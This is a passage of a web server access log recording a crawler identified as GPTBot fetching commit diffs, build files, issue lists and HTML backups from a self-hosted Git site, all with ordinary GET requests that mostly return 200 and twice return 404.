AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:18:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2flink.d" [Client 74.7.227.38] [Length 25802] [Gzip 6.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude%2fsite%2fpython3.12%2fgreenlet%2fgreenlet.h" [Client 74.7.227.38] [Length 29176] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2fquery%2fclient-vscode" [Client 74.7.227.38] [Length 24921] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:18:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fdepend.make" [Client 74.7.227.38] [Length 22770] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:18:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeSystem.cmake" [Client 74.7.227.38] [Length 25472] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdC%2fa.out" [Client 74.7.227.38] [Length 24213] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fsrc" [Client 74.7.227.38] [Length 24485] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:18:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fmain.cpp.o.d" [Client 74.7.227.38] [Length 30959] [Gzip 7.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX%2fa.out" [Client 74.7.227.38] [Length 24217] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir" [Client 74.7.227.38] [Length 24526] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:18:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fflags.make" [Client 74.7.227.38] [Length 23235] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fbuild.make" [Client 74.7.227.38] [Length 27004] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:39:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fmain.cpp.o" [Client 74.7.227.38] [Length 24231] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir" [Client 74.7.227.38] [Length 46457] [Gzip 10.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:18:39:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fprogress.make" [Client 74.7.227.38] [Length 22792] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:18:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 1845] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:18:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPostgresPatrol.spec" [Client 74.7.227.38] [Length 21701] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:18:39:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPostgresPatrol.exe" [Client 74.7.227.38] [Length 19780] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:18:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat?display=source" [Client 74.7.227.38] [Length 12465] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:39:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:39:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:39:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:18:39:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec?display=source" [Client 74.7.227.38] [Length 12501] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:18:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" -[17/Feb/2026:18:39:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16403] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:18:39:33 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:18:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10259] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:39:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:18:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21824] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" -[17/Feb/2026:18:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" -[17/Feb/2026:18:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" -[17/Feb/2026:18:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" -[17/Feb/2026:18:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21793] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" -[17/Feb/2026:18:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" -[17/Feb/2026:18:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" -[17/Feb/2026:18:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21825] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" -[17/Feb/2026:18:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21825] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" -[17/Feb/2026:18:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:39:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" -[17/Feb/2026:18:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs" [Client 74.7.227.38] [Length 21692] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:39:46 